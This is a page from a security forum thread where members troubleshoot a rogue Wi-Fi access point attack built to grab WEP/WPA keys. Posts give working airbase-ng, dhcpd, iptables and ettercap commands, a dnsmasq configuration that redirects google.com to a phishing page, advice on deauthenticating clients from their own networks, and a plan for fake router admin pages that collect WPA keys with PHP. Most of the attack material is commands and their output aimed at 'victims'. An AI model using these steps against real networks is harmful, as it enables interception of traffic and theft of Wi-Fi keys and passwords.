Page 2 of 8 FirstFirst 1234 ... LastLast
Results 11 to 20 of 80

Thread: Fake AP WEP/WPA key grab- Video and commands

  1. #11
    Member
    Join Date
    Sep 2008
    Posts
    146

    Default

    quick update on the ettercap issue.

    Putting ettercap in bridged mode actually kills the service since it tries to bridge the two connections itself (I think). However if you could disable the ettercap bridging functions it would probably work just fine since everything needed for ettercap is in place. I know wireshark and a few other programs can sniff traffic just as well but it would be nice to be able to see passwords come in in real time rather than having to pull them out of wireshark later.

    The solution I think would be to just put in a run of the mill logger, even a comercial one would work. The nice thing about the transparent setup is that you have complete access to anything that a normal sysadmin would, you own the network. Its the same as setting up a NAT firewall in a corporate office and then sniffing/filtering the traffic. There is no need to be sneaky about it.

    What id really like to do is setup and internal DNS server that only filters some of the queries to phishing pages then routes the rest of the traffic to the net as usual.

    One other question, you already need 2 wireless cards to pull this off. Can the same card that is hosting the AP also inject deauths? (for bumping clients off their legit networks) Or would i need a 3rd card to do that properly? Ill test it later when home.
    Morpheus: "You take the blue pill - the story ends, you wake up in your bed and believe whatever you want to believe. You take the red pill - you stay in Wonderland and I show you how deep the rabbit-hole goes."

    Neo: "What if I take both?"

    Morpheus: "Don't do that! You end up like Nick Nolte!"

  2. #12
    Junior Member
    Join Date
    Sep 2008
    Posts
    32

    Default

    I was thinking that Ettercap in Bridging Mode could be used instead of IP forwarding, making things a little easier to setup. I believe Ettercap controls the IP forwarding engine when it is doing its thing. So in addition to performing the inline sniffing and capture, you could also create some custom filters to handle intercept the DNS / HTTP requests that you are interested in and forward them to your own servers.

    I did a little experimenting with this yesterday with mixed results. I was running BT3 in a VirtualBox using NAT, and couldn't figure out how to disable VB's internal DHCP server. So my wireless client (connecting to the fake AP on BT) kept getting two sets of DHCP responses.

    I then switched VB to use host networking mode and things seemed to get initialized properly, the client was able to connect, get an IP address, etc.. but as soon as I tried loading some web traffic on the client, Ettercap kept crashing.

    In order to bridge two interfaces in Ettercap, they must be the same type (Ethernet, in my case) and they must have the same MTU size, so I set them both to 1400.

    For reference, here is the Ettercap command I used..

    ettercap -T -B eth0 -i at0

    Where I wanted to bridge the wireless client to the local BT ethernet interface which provided connectivity to the Internet.

    Thats about as far as I got with Ettercap, not sure what else I could try to prevent it from crashing.

    Don't want to derail the topic, just thought it would be interesting to try.

    -- Tom

  3. #13
    Member
    Join Date
    Feb 2010
    Posts
    204

    Default

    Quote Originally Posted by Revelati View Post
    One other question, you already need 2 wireless cards to pull this off. Can the same card that is hosting the AP also inject deauths? (for bumping clients off their legit networks) Or would i need a 3rd card to do that properly? Ill test it later when home.

    should be able to use the one card to deauth as its in monitor mode, give it a try

    I can see this project going in many directions depending on what the user wants to do.

    ettercap --- Another way is a 3rd wireless card, running on virtual, and using that to poison

  4. #14
    Good friend of the forums
    Join Date
    Jun 2008
    Posts
    425

    Default

    What id really like to do is setup and internal DNS server that only filters some of the queries to phishing pages then routes the rest of the traffic to the net as usual.
    Dnsmasq seems to work. Create a file and put "dnsmasq -C /root/dns.conf" and give it execute privs, create a file called dns.conf and put this in it
    resolv-file=/root/resolv.conf
    address=/www.google.com/127.0.0.1
    in the file /root/resolv.conf put
    nameserver 127.0.0.1
    nameserver 192.168.1.1 "internet gateway"

    on google.com it will redierct to your web site, others will go to the gateway and the internet.

    Hope it helps

  5. #15
    Senior Member
    Join Date
    Apr 2008
    Posts
    2,008

    Default

    So I finally got around to trying this out in real life and figured that I would start up slow with a simple transparent fake AP before moving on. The tutorial was very easy to follow, thank you once more for your input, however I did run into some problems that I hope somebody will be able to help me out with.

    Setup:
    Running BT3 in VMware Fusion on a MacBook and an ipod touch as the victim.
    wlan0 - Alfa 500mw used for the fake AP.
    eth0 - bridged connection from VMware (192.168.1.3).
    192.168.1.1 - router IP.

    Setting up the Fake AP:
    Code:
    bt ~ # modprobe tun
    bt ~ # airbase-ng -e "Open" wlan0 -v
    15:04:45  Created tap interface at0
    15:04:45  Trying to set MTU on at0 to 1500
    15:04:45  Trying to set MTU on wlan0 to 1800
    error setting MTU on wlan0
    15:04:45  MTU on wlan0 remains at 1500
    15:04:45  Access Point with BSSID 00:11:09:D8:90:34 started.
    ...
    15:09:28  Got directed probe request from 00:22:41:XX:XX:XX - "Open"
    15:09:29  Got an auth request from 00:22:41:XX:XX:XX (open system)
    15:09:29  Client 00:22:41:XX:XX:XX associated (unencrypted) to ESSID: "Open"
    Modifying /etc/dhcpd.conf:
    Code:
    ddns-update-style ad-hoc;
    default-lease-time 600;
    max-lease-time 7200;
    
    subnet 10.0.0.0 netmask 255.255.255.0 {
    option routers 10.0.0.1;
    option subnet-mask 255.255.255.0;
    option broadcast-address 10.0.0.0;
    option domain-name-servers 10.0.0.1;
    range dynamic-bootp 10.0.0.16 10.0.0.55;
    
    }
    Configuring at0:
    Code:
    bt ~ # ifconfig lo up
    bt ~ # ifconfig at0 up
    bt ~ # ifconfig at0 10.0.0.1 netmask 255.255.255.0
    bt ~ # ifconfig at0 mtu 1400
    bt ~ # route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    bt ~ # iptables --flush
    bt ~ # iptables --table nat --flush
    bt ~ # iptables --delete-chain
    bt ~ # iptables --table nat --delete-chain
    bt ~ # iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
    bt ~ # iptables -P FORWARD ACCEPT
    bt ~ # iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
    Starting dhcpd server:
    Code:
    bt ~ # killall dhcpd
    dhcpd: no process killed
    bt ~ # dhcpd -d -f -cf /etc/dhcpd.conf at0
    Internet Systems Consortium DHCP Server V3.0.6
    Copyright 2004-2007 Internet Systems Consortium.
    All rights reserved.
    For info, please visit http://www.isc.org/sw/dhcp/
    Wrote 0 leases to leases file.
    Listening on LPF/at0/00:11:09:d8:90:34/10.0.0/24
    Sending on   LPF/at0/00:11:09:d8:90:34/10.0.0/24
    Sending on   Socket/fallback/fallback-net
    DHCPDISCOVER from 00:22:41:XX:XX:XX via at0
    DHCPOFFER on 10.0.0.55 to 00:22:41:XX:XX:XX (iPod-Touch) via at0
    DHCPREQUEST for 10.0.0.55 (10.0.0.1) from 00:22:41:XX:XX:XX (iPod-Touch) via at0
    DHCPACK on 10.0.0.55 to 00:22:41:XX:XX:XX (iPod-Touch) via at0
    Checking ARP entries:
    Code:
    bt ~ # arp -n -v -i at0
    Address                  HWtype  HWaddress           Flags Mask            Iface
    10.0.0.55                ether   00:22:41:XX:XX:XX   C                     at0
    Entries: 2      Skipped: 1      Found: 1
    Victim dhcp entries:
    Code:
    IP: 10.0.0.55
    Netmask: 255.255.255.0
    Router: 10.0.0.1
    DNS: 192.168.1.1
    Check if the victim is reachable:
    Code:
    bt ~ # ping 10.0.0.55 -I at0
    PING 10.0.0.55 (10.0.0.55) from 10.0.0.1 at0: 56(84) bytes of data.
    64 bytes from 10.0.0.55: icmp_seq=1 ttl=64 time=5.06 ms
    64 bytes from 10.0.0.55: icmp_seq=2 ttl=64 time=3.14 ms
    As you can see both the fake AP and the dhcpd server is running fine and the victim is able to connect and is assigned an IP that is reachable. However, the victim is unable to surf the net so obviously the transparency is not working as intended, probably due to something that I have overlooked. Any help at all is appreciated.
    -Monkeys are like nature's humans.

  6. #16
    Member M1ck3y's Avatar
    Join Date
    Jul 2008
    Location
    Lost in the darkness
    Posts
    72

    Default

    I would be so glad to help you =Tron=, but I'm in a mess with the dhcp config which is not working on my testing network.

    First, I'm glad to tell you that me and some members from my french forum are working on a tool called GTWPA which will offer an automatic WPA/Rogue-AP/Fake-admin-panel-asking-for-the-key attack with airbase-ng. We are actually making fake webpages asking for the key, here are 2 preview examples:

    Livebox

    Numericable

    The webpages will get the wpa key with php and write them into a text files, we will probably make logs and a "stats" function which will display the date&time/essid/key so that the user will easily keep all the collected datas. We will make webpages from administration panels in english, you can help us by downloading the webpage from your administration panel interface (in firefox File, Save page as... .html) and give the pages and associated files to us right here, or on the french forum in this topic: Technique de recuperation de clef WPA par rogue et PHP., use google translation if you don't understand french.

    Ok, so to develop this tool, we need to know the right and functionnals commands before starting to script something... I just made a few tests, following your example, and it was unsuccessfull on my testing network. The target was a WPA TKIP network, and I didn't even managed to get the client truly connected to the rogue AP.

    Airbase-ng was saying it was alright:

    Code:
    08:58:16  Got an auth request from 00:12:F0:6F:ED:38 (open system)
    08:58:16  Client 00:12:F0:6F:ED:38 associated (WPA1;TKIP) to ESSID: "linksys"
    08:58:20  Got directed probe request from 00:12:F0:6F:ED:38 - "linksys"
    08:58:20  Got directed probe request from 00:12:F0:6F:ED:38 - "linksys"
    08:58:20  Got broadcast probe request from 00:12:F0:6F:ED:38
    08:58:21  Got directed probe request from 00:12:F0:6F:ED:38 - "linksys"
    08:58:21  Got directed probe request from 00:12:F0:6F:ED:38 - "linksys"
    08:58:21  Got broadcast probe request from 00:12:F0:6F:ED:38
    08:58:22  Got directed probe request from 00:12:F0:6F:ED:38 - "linksys"
    08:58:22  Got an auth request from 00:12:F0:6F:ED:38 (open system)
    08:58:22  Client 00:12:F0:6F:ED:38 associated (WPA1;TKIP) to ESSID: "linksys"
    But I could see on the client (windoz XP wireless zero) screen that he was trying to get an IP, disconnecting, trying to get an IP... Until he disconnects totally and I had to manually stop and restart the wireless card.

    In fact, I could see that he couldn't get an Ip because the dhcp stopped, it seems that the at0 was down, altough it was up when I launched the attack:

    Code:
    bt ~ # dhcpd -d -f -cf /etc/dhcpd.conf at0
    Internet Systems Consortium DHCP Server V3.0.6
    Copyright 2004-2007 Internet Systems Consortium.
    All rights reserved.
    For info, please visit http://www.isc.org/sw/dhcp/
    Wrote 0 leases to leases file.
    Listening on LPF/at0/00:0c:41:d3:12:81/10.0.0/24
    Sending on   LPF/at0/00:0c:41:d3:12:81/10.0.0/24
    Sending on   Socket/fallback/fallback-net
    receive_packet failed on at0: Network is down
    
    bt ~ #
    Here is my testing config:
    BT3 is @ 192.168.1.12
    Router is @192.168.1.1
    netmask 255.255.255.0
    getaway 192.168.1.1
    dns 192.168.1.1
    Internet via eth0

    So that's a basical standard network scheme, I can't understand what's going wrong. Is that a problem with WPA encryption? Airbase-ng is supposed to work with it, I use this command for the Rogue AP:

    Code:
    modprobe tun
    airbase-ng -a 00:0C:41:D3:12:81 -e linksys -v -c 1 -z 2 wlan0
    As you could make the rogue almost functionnal, do you have any tip that could help us? I know all this is a lot of work, but when we will get the functiunnal commands we will start to develop our tool specially for BT3, and create new "fake" webpages so that everyone will be able to easily use those nice features airbase-ng provides

    Please don't be afraid if all the mac adresses are in clear, they are all spoofed anyway, and I'm working on my own network of course. If anyone can help us making this work... And I wish to say thx to all of you here working on this, that's very interesting and we're just at the beginning of new really powerful attacks
    Last edited by M1ck3y; 08-05-2010 at 09:48 PM.
    --~ Internet is in the air we are breathing, so it should be free for everyone. We'll get there, just wait and see... ~--

  7. #17
    Member
    Join Date
    Sep 2008
    Posts
    146

    Default

    To Tron,

    I ran into this problem myself and I think I know what the trouble is. If you can ping sites on the internet but cant seem to get the DNS servers to respond then it is likely an issue with UDP not being forwarded properly. Im not sure why this keeps DNS queries from showing up but it comes down to this little line in IP tables.

    My line:
    iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.1.1

    Your line:
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1


    Perhaps the "--dport 53" setting is required, that was the only difference I could find. Im still having problems with my own configuration. I can only ping google on the outside, cant ping of DNS to anything other than google, which is really weird.

    There are 8 more pages of discussion about this topic in another thread:
    http://forums.remote-exploit.org/sho...t=17692&page=6

    It may help answer a few questions to read through that, it helped me get up and running even with zero knowledge of masquerading and iptables. Even though hm2075 beat me to getting it operational *shakes fist!*
    Morpheus: "You take the blue pill - the story ends, you wake up in your bed and believe whatever you want to believe. You take the red pill - you stay in Wonderland and I show you how deep the rabbit-hole goes."

    Neo: "What if I take both?"

    Morpheus: "Don't do that! You end up like Nick Nolte!"

  8. #18
    Good friend of the forums
    Join Date
    Jun 2008
    Posts
    425

    Default

    bt ~ # modprobe tun
    bt ~ # airbase-ng -e "Open" wlan0 -v
    15:04:45 Created tap interface at0
    15:04:45 Trying to set MTU on at0 to 1500
    15:04:45 Trying to set MTU on wlan0 to 1800
    error setting MTU on wlan0
    15:04:45 MTU on wlan0 remains at 1500
    15:04:45 Access Point with BSSID 00:11:098:90:34 started.
    ...
    15:09:28 Got directed probe request from 00:22:41:XX:XX:XX - "Open"
    15:09:29 Got an auth request from 00:22:41:XX:XX:XX (open system)
    15:09:29 Client 00:22:41:XX:XX:XX associated
    sorry to be a pain, but don't you need -P -C "1-100" as the airbase want respond to probes right ?

  9. #19
    Member
    Join Date
    Feb 2010
    Posts
    204

    Default

    If the victim can't surf the internet then try using the ip address for the webpage instead.

    I.E http://64.233.183.132/ for google

    If that works then it is a dns issue

    I too have had problems with airbase-ng not working with -P command, still working on that aspect,

    what we need is the victim to be disconnected from his/her own connection, they then probe and our ap responds and allows connection.

    oh and don't be thick like me and have airodump running as well, it cycles through the channels hence no connection ever

  10. #20
    Member
    Join Date
    Feb 2010
    Posts
    204

    Default

    I think your problem is the port forwarding, in ubuntu I enabled it elsewhere

    backtrack users -- don't forget
    echo 1 > /proc/sys/net/ipv4/ip_forward


    dhcpd -cf dhcpd.conf -lf dhcpd.leases at0
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A POSTROUTING --out-interface wlan0 -j MASQUERADE
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.1.1


    regarding airbase, I suggest you go for a basic setup with no probe response, get that working and then try something else, otherwise it will take twice as long to identify your problems

    oh and another thing, if you are going to use the probe command, somehow blacklist your own ap if using another wireless card, otherwise you get probes coming from all directions

Page 2 of 8 FirstFirst 1234 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •